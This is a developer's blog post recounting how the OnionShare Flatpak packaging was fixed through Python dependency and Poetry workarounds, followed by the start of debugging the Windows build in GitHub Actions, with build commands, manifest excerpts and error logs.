What goes into making an OnionShare release: Part 22023-09-29T00:00:00ZMicah Leeurn:uuid:7559d210-ffe4-3a46-a1b8-70f8f34e4def<p>A few weeks ago I intended to make an OnionShare release, documenting the entire arduous process. I made a lot of progress, but then ran into endless problems getting the Flatpak packaging working and so decided to delay the release. Now I'm back at it. In this post I will finish tackling Flatpak and start tackling the Windows and macOS releases.</p>
<p>If you haven't read <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1 of this series</a>, you might want to check it out now. I describe how I started making the release. I merged in translations from Weblate and made sure the correct translations were enabled for the desktop app and the documentation. After some struggling I got the Snapcraft release working--this involved upgrading the snap base from <code>core20</code> to <code>core22</code> so that I could upgrade from PySide2 to PySide6. I then ran into a wall trying to get Flatpak working.</p>
<p>⚠️ <em>WARNING:</em> This blog post may make you want to smash your face against your keyboard due to the sheer volume of technical issues, error messages, and general injury to morale. I received feedback that the last blog post should have contained a similar warning, so I didn't want to repeat the same mistake.</p>
<p>Like part 1, this blog post is also <em>stupidly long</em>. And also like part 1, I didn't actually finish the release like I was hoping to, so expect a part 3. Here's a table of contents for this post:</p>
<ul>
<li><a href="#finishing-the-flatpak-release">Finishing the Flatpak release</a><ul>
<li><a href="#stopping-using-poetry-with-flatpak">Stopping using Poetry with Flatpak</a></li>
<li><a href="#fixing-the-cli-python-packaging-issues">Fixing the CLI Python packaging issues</a></li>
</ul>
</li>
<li><a href="#updating-dependencies-again">Updating dependencies again</a></li>
<li><a href="#building-onionshare-for-windows">Building OnionShare for Windows</a><ul>
<li><a href="#debugging-windows-build-in-github-actions">Debugging Windows build in GitHub Actions</a></li>
<li><a href="#setting-up-windows-for-onionshare-development">Setting up Windows for OnionShare development</a></li>
<li><a href="#debugging-windows-build-in-github-actions-some-more">Debugging Windows build in GitHub Actions some more</a></li>
<li><a href="#testing-the-windows-binary-from-github-actions">Testing the Windows binary from GitHub Actions</a></li>
</ul>
</li>
<li><a href="#building-onionshare-for-macos">Building OnionShare for macOS</a><ul>
<li><a href="#setting-up-macos-for-onionshare-development">Setting up macOS for OnionShare development</a></li>
<li><a href="#building-the-macos-app-bundle">Building the macOS app bundle</a></li>
</ul>
</li>
<li><a href="#time-to-take-a-break">Time to take a break</a></li>
</ul>
<p>I'll start where I left off, with Flatpak.</p>
<h2 id="finishing-the-flatpak-release">Finishing the Flatpak release</h2><p>When I left off a few weeks ago, I had made some progress with the Flatpak release, updating <code>pyside6</code> and <code>tor</code>. But I got seriously stuck on compiling <code>obfs4proxy</code>, <code>meek-client</code>, and <code>snowflake-client</code> -- these are all Tor pluggable transports programmed in Go, and they're used to bypass censorship on networks where access to the Tor network is blocked.</p>
<p>When you need to add Go dependencies to Flatpak, you're supposed to use a script in the <a href="https://github.com/flatpak/flatpak-builder-tools">flatpak-builder-tools</a> project to help you write the Flatpak manifest file, but it turns out that due to changes in the Go ecosystem, the script was entirely broken. I spent many hours completely rewriting it (here is my <a href="https://github.com/flatpak/flatpak-builder-tools/pull/369">pull request</a>), but I still ran into problems, and ultimately decided to just not update these dependencies for this release, leaving this as a future Micah problem.</p>
<p>I then found that the Flatpak package was failing to build because of some Python packaging changes affecting the <code>onionshare-cli</code> (the command line version of OnionShare) and <code>onionshare</code> (the desktop version) parts. It turns out that installing these Python projects like this was deprecated:</p>
<div class="hll"><pre><span></span>python3<span class="w"> </span>setup.py<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span>
</pre></div>
<p>And I had to replace it with this:</p>
<div class="hll"><pre><span></span>pip3<span class="w"> </span>install<span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--no-deps<span class="w"> </span>.
</pre></div>
<p>After this, I tried building the Flatpak package, and hit the following error in the <code>onionshare-cli</code> part:</p>
<pre><code>$ flatpak-builder build --force-clean --jobs=$(nproc) --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
ERROR: Could not find a version that satisfies the requirement poetry-core (from versions: none)
ERROR: No matching distribution found for poetry-core
--snip--
</code></pre>
<p>That's where I gave up. Now that I'm back, I have an idea.</p>
<h3 id="stopping-using-poetry-with-flatpak">Stopping using Poetry with Flatpak</h3><p>OnionShare uses Poetry to manage its dependencies, but you can't use Poetry with Flatpak. Instead, in the Flatpak manifest file you have to define URLs and SHA256 checksums of every Python dependency, and install them from there.</p>
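<p>Each dependency in the manifest is a "file" source pairing a download URL with the SHA256 checksum of the artifact. As a rough illustration of how a generator script produces such an entry once a wheel has been downloaded locally (<code>manifest_source_entry()</code> is a hypothetical helper, not code from flatpak-builder-tools):</p>

```python
import hashlib


def manifest_source_entry(url, path):
    """Build a Flatpak "file" source entry: the download URL plus the
    SHA256 checksum of the already-downloaded artifact."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Hash in chunks so large wheels don't have to fit in memory.
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return {"type": "file", "url": url, "sha256": digest.hexdigest()}
```

<p>Entries like this are what you can see later in the manifest excerpts, one <code>url</code>/<code>sha256</code> pair per Python package.</p>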
<p>Since I changed from directly running <code>python3 setup.py install</code> to using <code>pip3 install</code>, I think the problem is that <code>pip3</code> is looking at the <code>pyproject.toml</code> file to figure out how to install the project, and from there it can see that dependencies are managed by Poetry. I think the simplest solution is to just delete the <code>pyproject.toml</code> file before running <code>pip3 install</code>.</p>
<p>So I updated the <code>onionshare-cli</code> part from this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
</pre></div>
<p>To this:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">rm cli/pyproject.toml</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
</pre></div>
<p>Similarly, for the <code>onionshare</code> part, I added <code>rm desktop/pyproject.toml</code> in the <code>build-commands</code> list.</p>
<p>Then I tried building it again:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
</code></pre>
<p>It worked without error this time. What happens when I run it?</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
  File "/app/bin/onionshare", line 5, in <module>
    from onionshare import main
  File "/app/lib/python3.10/site-packages/onionshare/__init__.py", line 34, in <module>
    from onionshare_cli.common import Common
  File "/app/lib/python3.10/site-packages/onionshare_cli/__init__.py", line 30, in <module>
    from .web import Web
  File "/app/lib/python3.10/site-packages/onionshare_cli/web/__init__.py", line 21, in <module>
    from .web import Web
  File "/app/lib/python3.10/site-packages/onionshare_cli/web/web.py", line 26, in <module>
    from packaging.version import Version
ModuleNotFoundError: No module named 'packaging'
</code></pre>
<h3 id="fixing-the-cli-python-packaging-issues">Fixing the CLI Python packaging issues</h3><p>The <code>onionshare-cli</code> package is missing the <code>packaging</code> Python dependency. So, I added that dependency to the CLI project:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli
poetry<span class="w"> </span>add<span class="w"> </span>packaging
</pre></div>
<p>And then, using the <code>poetry-to-requirements.py</code> that I <a href="../what-goes-into-making-an-onionshare-release/#adding-poetry-to-requirements-txt-script">programmed and described</a> in part 1, I rebuilt the <code>onionshare-cli</code> dependencies:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>~/code/flatpak-builder-tools/pip/
./flatpak-pip-generator<span class="w"> </span><span class="k">$(</span>../../onionshare/flatpak/poetry-to-requirements.py<span class="w"> </span>../../onionshare/cli/pyproject.toml<span class="k">)</span>
../flatpak-json2yaml.py<span class="w"> </span>./python3-modules.json
mv<span class="w"> </span>python3-modules.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>I then updated the Flatpak manifest to use the dependencies in <code>onionshare-cli.yaml</code>, and rebuilt and installed the Flatpak package, and tried running it again. This time, it failed with another import:</p>
<pre><code>$ flatpak run org.onionshare.OnionShare
Traceback (most recent call last):
  File "/app/bin/onionshare", line 5, in <module>
    from onionshare import main
  File "/app/lib/python3.10/site-packages/onionshare/__init__.py", line 34, in <module>
    from onionshare_cli.common import Common
  File "/app/lib/python3.10/site-packages/onionshare_cli/__init__.py", line 31, in <module>
    from .onion import TorErrorProtocolError, TorTooOldEphemeral, TorTooOldStealth, Onion
  File "/app/lib/python3.10/site-packages/onionshare_cli/onion.py", line 27, in <module>
    import nacl.public
  File "/app/lib/python3.10/site-packages/nacl/public.py", line 16, in <module>
    import nacl.bindings
  File "/app/lib/python3.10/site-packages/nacl/bindings/__init__.py", line 16, in <module>
    from nacl.bindings.crypto_aead import (
  File "/app/lib/python3.10/site-packages/nacl/bindings/crypto_aead.py", line 17, in <module>
    from nacl._sodium import ffi, lib
ModuleNotFoundError: No module named 'nacl._sodium'
</code></pre>
<p>It looks like, for some reason, the flatpak-builder-tools PIP generator script isn't properly installing PyNaCl, a cryptography library that OnionShare uses.</p>
<p>While I was writing my first blog post about this release, I opened a <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371">bug report</a> in the flatpak-builder-tools repo explaining that the Poetry lockfile generator was broken. Longtime OnionShare developer Miguel Jacq posted a <a href="https://github.com/flatpak/flatpak-builder-tools/issues/371#issuecomment-1716841714">comment</a> on that bug report pointing to a <a href="https://github.com/flatpak/flatpak-builder-tools/pull/353">pull request</a> in the flatpak-builder-tools repo which actually fixed the issue, but hadn't yet been approved and merged. (Welcome to the world of open source software development.)</p>
<p>Since I was having trouble with the PIP generator, I figured maybe the patched Poetry lockfile generator would work. So, in my <code>flatpak-builder-tools/poetry</code> folder I patched <code>flatpak-poetry-generator.py</code> to match what's in that PR, and then I used it to generate the dependencies:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>flatpak-builder-tools/poetry
./flatpak-poetry-generator.py<span class="w"> </span>--production<span class="w"> </span>../../onionshare/cli/poetry.lock
../flatpak-json2yaml.py<span class="w"> </span>generated-poetry-sources.json
mv<span class="w"> </span>generated-poetry-sources.yml<span class="w"> </span>onionshare-cli.yaml
</pre></div>
<p>Now, <code>onionshare-cli.yaml</code> has a block of code that should define all of the dependencies, and it starts like this:</p>
<div class="hll"><pre><span></span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">poetry-deps</span>
<span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST}</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bidict blinker brotli certifi cffi charset-normalizer click colorama cython dnspython</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">eventlet exceptiongroup flask flask-compress flask-socketio gevent gevent-websocket</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">greenlet idna importlib-metadata iniconfig itsdangerous jinja2 markupsafe packaging</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pluggy psutil pycparser pynacl pysocks pytest python-engineio python-socketio</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">requests setuptools six stem tomli unidecode urllib3 waitress werkzeug zipp zope-event</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">zope-interface</span>
<span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/b5/82/ce0b6380f35f49d3fe687979a324c342cfa3588380232f3801db9dd62f9e/bidict-0.22.1-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b</span>
<span class="l l-Scalar l-Scalar-Plain">--snip--</span>
</pre></div>
<p>I added this to the Flatpak manifest file, replacing the dependencies for the <code>onionshare-cli</code>, and tried to build the Flatpak package again. This time, it failed to finish building:</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Processing ./gevent-23.9.0.post1.tar.gz
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [4 lines of output]
Looking in links: file:///run/build/poetry-deps
Processing ./setuptools-68.1.2-py3-none-any.whl
ERROR: Could not find a version that satisfies the requirement Cython>=3.0.2 (from versions: none)
ERROR: No matching distribution found for Cython>=3.0.2
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
Error: module poetry-deps: Child process exited with code 1
</code></pre>
<p>It needs <code>Cython>=3.0.2</code>, and somehow the Poetry lockfile generator didn't detect this. No worries, I'll just add it. Back in the <code>cli</code> folder I added it by running:</p>
<pre><code>$ poetry add Cython
Using version ^3.0.2 for cython
Updating dependencies
Resolving dependencies... (0.5s)
Package operations: 1 install, 0 updates, 0 removals
• Installing cython (3.0.2)
</code></pre>
<p>Then I used the Poetry lockfile generator to rebuild the deps, added them to the Flatpak manifest file, and tried building it again. And it failed again. Here's the relevant error message this time:</p>
<pre><code>Processing ./gevent-23.9.0.post1.tar.gz
Installing build dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install build dependencies did not run successfully.
│ exit code: 1
╰─> [8 lines of output]
Looking in links: file:///run/build/poetry-deps
Processing ./setuptools-68.1.2-py3-none-any.whl
Processing ./Cython-3.0.2-py2.py3-none-any.whl
Processing ./cffi-1.15.1.tar.gz
Preparing metadata (setup.py): started
Preparing metadata (setup.py): finished with status 'done'
ERROR: Could not find a version that satisfies the requirement greenlet>=3.0rc1 (from versions: 2.0.2)
ERROR: No matching distribution found for greenlet>=3.0rc1
[end of output]
</code></pre>
<p>Ugh. Okay, instead of tediously documenting each little thing I try, I'm going to take a break from blogging and focus on just fixing this problem...</p>
<p>🎵 Debugging noises... 🎵</p>
<p>Got it working! Ultimately, I had to add the following Poetry dependencies to the <code>onionshare-cli</code> project:</p>
<pre><code>packaging = "^23.1"
gevent = "^23.9.1"
wheel = "^0.41.2"
cffi = "^1.15.1"
cython = "^3.0.2"
</code></pre>
<p>Also, after running <code>poetry add</code> to add dependencies, for some reason <code>greenlet</code> kept getting upgraded to version 3.0.0rc3. But when I ran <code>poetry update</code>, it would then downgrade to the latest stable version, 2.0.2, which is what I wanted. I don't understand the byzantine network of dependency relationships that Poetry is unraveling, but at least I got it working.</p>
<p>And I also had to modify the output from the Poetry lockfile generator. It kept crashing while trying to install the <code>brotlicffi</code> package with an error message that included this:</p>
<pre><code>********************************************************************************
Requirements should be satisfied by a PEP 517 installer.
If you are using pip, you can try `pip install --use-pep517`.
********************************************************************************
</code></pre>
<p>So, I modified the <code>onionshare-cli</code> part to first explicitly install <code>brotlicffi</code> by running this:</p>
<div class="hll"><pre><span></span>pip3<span class="w"> </span>install<span class="w"> </span>--no-index<span class="w"> </span>--find-links<span class="o">=</span><span class="s2">"file://</span><span class="si">${</span><span class="nv">PWD</span><span class="si">}</span><span class="s2">"</span><span class="w"> </span>--prefix<span class="o">=</span><span class="si">${</span><span class="nv">FLATPAK_DEST</span><span class="si">}</span><span class="w"> </span>--use-pep517<span class="w"> </span>brotlicffi
</pre></div>
<p>And then continue on with installing the rest of the Python packages like normal. Here's what the <code>onionshare-cli</code> part of the Flatpak manifest file looked like:</p>
<div class="hll"><pre><span></span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">onionshare-cli</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">rm cli/pyproject.toml</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd cli && pip3 install --prefix=${FLATPAK_DEST} --no-deps .</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">dir</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">..</span>
<span class="w"> </span><span class="c1"># - type: git</span>
<span class="w"> </span><span class="c1"># url: https://github.com/onionshare/onionshare.git</span>
<span class="w"> </span><span class="c1"># tag: v2.6</span>
<span class="w"> </span><span class="nt">modules</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">poetry-deps</span>
<span class="w"> </span><span class="nt">buildsystem</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">simple</span>
<span class="w"> </span><span class="nt">build-commands</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST} --use-pep517 brotlicffi</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">pip3 install --no-index --find-links="file://${PWD}" --prefix=${FLATPAK_DEST}</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">bidict blinker brotli certifi cffi charset-normalizer click colorama</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cython dnspython eventlet exceptiongroup flask flask-compress flask-socketio gevent</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">gevent-websocket greenlet h11 idna importlib-metadata iniconfig itsdangerous</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">jinja2 markupsafe packaging pluggy psutil pycparser pynacl pysocks pytest python-engineio</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">python-socketio requests setuptools simple-websocket six stem tomli unidecode</span>
<span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">urllib3 waitress werkzeug wheel wsproto zipp zope-event zope-interface</span>
<span class="w"> </span><span class="nt">sources</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/b5/82/ce0b6380f35f49d3fe687979a324c342cfa3588380232f3801db9dd62f9e/bidict-0.22.1-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">6ef212238eb884b664f28da76f33f1d28b260f665fc737b413b287d5487d1e7b</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">type</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">file</span>
<span class="w"> </span><span class="nt">url</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">https://files.pythonhosted.org/packages/0d/f1/5f39e771cd730d347539bb74c6d496737b9d5f0a53bc9fdbf3e170f1ee48/blinker-1.6.2-py3-none-any.whl</span>
<span class="w"> </span><span class="nt">sha256</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">c3d739772abb7bc2860abf5f2ec284223d9ad5c76da018234f6f50d6f31ab1f0</span>
<span class="l l-Scalar l-Scalar-Plain">--snip--</span>
</pre></div>
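<p>Each dependency in the manifest is pinned as a <code>file</code> source with its URL and SHA-256 checksum. As a sketch of how one of these entries could be generated from a downloaded wheel (a hypothetical helper, not part of OnionShare's tooling):</p>

```python
import hashlib

def manifest_source(url: str, wheel_bytes: bytes) -> dict:
    # Pin a downloaded wheel by URL and SHA-256 checksum, in the shape
    # flatpak-builder expects for a "file" source entry.
    return {
        "type": "file",
        "url": url,
        "sha256": hashlib.sha256(wheel_bytes).hexdigest(),
    }
```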
<p>And now, remarkably, I can build the Flatpak package and it actually runs!</p>
<pre><code>$ flatpak-builder build --force-clean --install-deps-from=flathub --install --user flatpak/org.onionshare.OnionShare.yaml
--snip--
Installing app/org.onionshare.OnionShare/x86_64/master
Pruning cache
$ flatpak run org.onionshare.OnionShare
╭───────────────────────────────────────────╮
│ * ▄▄█████▄▄ * │
│ ▄████▀▀▀████▄ * │
│ ▀▀█▀ ▀██▄ │
│ * ▄█▄ ▀██▄ │
│ ▄█████▄ ███ -+- │
│ ███ ▀█████▀ │
│ ▀██▄ ▀█▀ │
│ * ▀██▄ ▄█▄▄ * │
│ * ▀████▄▄▄████▀ │
│ ▀▀█████▀▀ │
│ -+- * │
│ ▄▀▄ ▄▀▀ █ │
│ █ █ ▀ ▀▄ █ │
│ █ █ █▀▄ █ ▄▀▄ █▀▄ ▀▄ █▀▄ ▄▀▄ █▄▀ ▄█▄ │
│ ▀▄▀ █ █ █ ▀▄▀ █ █ ▄▄▀ █ █ ▀▄█ █ ▀▄▄ │
│ │
│ v2.6.1 │
│ │
│ https://onionshare.org/ │
╰───────────────────────────────────────────╯
</code></pre>
<p><img src="flatpak-onionshare.png" alt="Screenshot of OnionShare running in Flatpak"></p>
<p>I tried out a few things. I connected to Tor, I shared some files with myself and downloaded them using Tor Browser, and I tested connecting to Tor using a bridge. It all works! I think, finally, I have finished Flatpak packaging.</p>
<h2 id="updating-dependencies-again">Updating dependencies again</h2><p>I already did this in part 1, but it's been a few weeks and a lot of new versions of dependencies have been released. So I went ahead and updated all of the Poetry deps like this:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>cli
poetry<span class="w"> </span>update
<span class="nb">cd</span><span class="w"> </span>../desktop
poetry<span class="w"> </span>update
<span class="nb">cd</span><span class="w"> </span>../docs
poetry<span class="w"> </span>update
</pre></div>
<p>This is especially important because OnionShare depends on <code>gevent</code> which just had a <a href="https://github.com/advisories/GHSA-x7m3-jprg-wc5g">critical privilege escalation vulnerability</a> (though we confirmed that OnionShare itself isn't vulnerable to it).</p>
<h2 id="building-onionshare-for-windows">Building OnionShare for Windows</h2><p>Making a release is always painful, but this one has been much more painful than normal. With my Flatpak woes out of the way, I'm hoping for smooth sailing going forward. In order to reduce the pain, I've tried to automate as much of the Windows and macOS build process as I can using a <a href="https://docs.github.com/en/actions">GitHub Actions</a> workflow. Basically, when I push new commits to a PR on GitHub, a robot goes to work trying to build binaries for me for 64-bit Windows, Intel macOS, and also Snapcraft and Flatpak for Linux.</p>
<p>After I pushed my latest commit to my <a href="https://github.com/onionshare/onionshare/pull/1749">PR branch</a>, the GitHub Actions workflow was triggered. It successfully built Snapcraft and Flatpak binaries, but it failed at building Windows and macOS binaries.</p>
<p><img src="github-actions-1.png" alt="Screenshot of the GitHub Actions workflow, with the build-win64 and build-mac-intel jobs failing"></p>
<p>When I click on the failed <code>build-win64</code> job for details, I see that it failed on the "Build snowflake" step:</p>
<p><img src="github-actions-2.png" alt="Failing on the build-win64 job, in the build snowflake step"></p>
<h3 id="debugging-windows-build-in-github-actions">Debugging Windows build in GitHub Actions</h3><p>Let me back up and explain what's going on. In the OnionShare git repo there's a file called <code>.github/workflows/build.yml</code> that defines code that tells VMs how to build these binaries. Here's the beginning of the code for the <code>build-win64</code> job:</p>
<div class="hll"><pre><span></span><span class="nt">build-win64</span><span class="p">:</span>
<span class="w"> </span><span class="nt">runs-on</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">windows-latest</span>
<span class="w"> </span><span class="nt">steps</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/checkout@v3</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install python</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/setup-python@v4</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">python-version</span><span class="p">:</span><span class="w"> </span><span class="s">'3.10.11'</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install poetry</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">C:\hostedtoolcache\windows\Python\3.10.11\x64\python -m pip install poetry</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Restore cache - poetry</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/cache@v3</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">~\AppData\Local\pypoetry\Cache\virtualenvs</span>
<span class="w"> </span><span class="nt">key</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">${{ runner.os }}-win64-poetry-${{ hashFiles('desktop/poetry.lock') }}</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Install poetry dependencies</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">|</span>
<span class="w"> </span><span class="no">cd desktop</span>
<span class="w"> </span><span class="no">C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry install</span>
<span class="w"> </span><span class="no">C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry env list --full-path</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Restore cache - tor</span>
<span class="w"> </span><span class="nt">uses</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">actions/cache@v3</span>
<span class="w"> </span><span class="nt">with</span><span class="p">:</span>
<span class="w"> </span><span class="nt">path</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">desktop\build\tor</span>
<span class="w"> </span><span class="nt">key</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">${{ runner.os }}-win64-tor-${{ hashFiles('desktop/scripts/get-tor.py') }}</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Get tor binaries from Tor Browser (64-bit)</span>
<span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">cd desktop && C:\hostedtoolcache\windows\Python\3.10.11\x64\Scripts\poetry run python .\scripts\get-tor.py win64</span>
</pre></div>
<p>Basically, GitHub Actions starts a Windows VM that's preloaded with development tools and then runs these steps one at a time. First it checks out the git repo, then installs Python 3.10.11, then using that version of Python it installs Poetry. It then installs the Poetry dependencies, and runs the <code>desktop/scripts/get-tor.py</code> Python script to download Tor Browser for Windows and extract the binaries.</p>
<p>Before various steps this job also restores some caches. This saves time. For example, if I push a new commit and <code>desktop/poetry.lock</code> hasn't changed, then it just uses the Poetry virtualenv from the previous run instead of having to re-download and install all of the Poetry deps.</p>
